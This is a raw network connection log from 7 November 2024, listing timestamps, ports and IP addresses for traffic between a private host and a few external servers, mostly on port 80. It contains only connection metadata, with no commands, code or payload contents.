Nov 7, 2024 07:33:24.338184118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338186979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338196993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338211060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338217020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338222027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338236094 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338255882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338792086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338804007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338814020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338824987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338836908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338848114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338849068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338860035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338870049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338875055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338881969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338896990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338900089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338908911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.338921070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338939905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.338969946 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339760065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339771986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339782000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339793921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339804888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339813948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339817047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339828968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339838028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339839935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339850903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339862108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339867115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339874029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339885950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339885950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.339907885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.339931965 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.340562105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.340610981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.355334997 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.373184919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373195887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373208046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373236895 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373269081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373281002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373291969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373301029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373312950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373325109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373327017 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373352051 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373362064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373626947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373636007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373645067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373657942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373668909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373672962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373702049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373727083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373889923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373929024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.373986959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.373999119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.374010086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.374022961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.374032974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.374053955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.415661097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.415673971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.415683985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.415713072 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.415747881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.432302952 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.455245018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455303907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455311060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455317974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455343962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455354929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455415964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455426931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455436945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455449104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455454111 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455466986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455490112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455704927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455751896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455881119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455893040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455904007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455914974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455921888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455923080 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.455926895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.455940962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.455977917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456361055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456372023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456382990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456396103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456407070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456410885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456418991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456429958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456433058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456440926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456442118 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456476927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456526995 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.456578970 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.456919909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456929922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456938982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456950903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456963062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456976891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456981897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456989050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.456995964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.456999063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457011938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457027912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457046986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457581043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457592010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457601070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457612991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457623005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457623005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457634926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457649946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457652092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457662106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457672119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457681894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457683086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457695961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457705021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.457706928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457726002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.457751036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.458364010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458374977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458384991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458395958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458406925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458422899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.458431005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458441973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458446026 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.458452940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.458477974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.458489895 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.458990097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459001064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459012032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459023952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459033966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459037066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459044933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459054947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459064960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459067106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459079027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459088087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459100962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459105968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459110975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459132910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459148884 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459892035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459903955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459918976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459930897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459948063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.459953070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.459975958 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.460000038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.460695028 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.460748911 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.460777998 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.460797071 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.460808039 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.460844040 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.460850000 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.461390972 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.461435080 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.461441994 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.469382048 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.469460964 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.469468117 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.480798960 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.480869055 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.480993986 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.492594004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492641926 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.492662907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492676020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492710114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.492732048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.492796898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492808104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492816925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492841005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.492872000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.492924929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492937088 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.492984056 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493058920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493112087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493124008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493160009 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493310928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493321896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493336916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493356943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493380070 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493442059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493496895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493509054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493516922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493518114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.493544102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.493570089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.510226011 CET	49892	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.510235071 CET	443	49892	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.533297062 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.533323050 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.533435106 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.535516977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.535574913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.535582066 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.535586119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.535608053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.535623074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.574938059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.574950933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.574961901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.574991941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575026035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575052023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575062990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575073004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575087070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575098038 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575124979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575403929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575422049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575447083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575459003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575469017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575469017 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575493097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575510979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575695992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575706005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575726032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575737000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575747013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575748920 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575757980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575766087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575768948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.575795889 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.575817108 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576212883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576222897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576232910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576245070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576256037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576272011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576303005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576339006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576374054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576468945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576479912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576491117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576500893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576512098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576523066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576524019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576533079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576544046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576548100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576556921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.576566935 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576586962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.576608896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577299118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577310085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577318907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577330112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577341080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577354908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577357054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577366114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577374935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577379942 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577384949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577395916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577406883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577413082 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577416897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577428102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577431917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577440023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577445984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577450037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.577467918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.577495098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578155041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578165054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578176022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578188896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578198910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578198910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578208923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578219891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578233957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578236103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578247070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578257084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578258038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578267097 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578269005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578280926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578291893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.578299046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.578330994 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579046965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579057932 CET	80	49882	185.215.113.16	192.168.2.4
